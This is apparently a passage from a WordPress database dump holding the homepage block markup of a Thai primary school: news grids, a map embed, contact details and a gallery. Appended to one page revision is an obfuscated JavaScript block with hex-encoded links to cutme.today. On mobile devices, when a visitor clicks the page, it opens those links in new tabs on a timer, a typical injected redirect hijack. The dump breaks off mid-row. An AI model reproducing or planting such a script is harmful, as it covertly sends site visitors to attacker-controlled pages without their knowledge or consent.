200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-31 10:50:34','2024-07-31 03:50:34','',14,'http://pakhaeng.ssk.in.th/?p=306',0,'revision','',0),
(307,1,'2024-07-31 10:51:59','2024-07-31 03:51:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 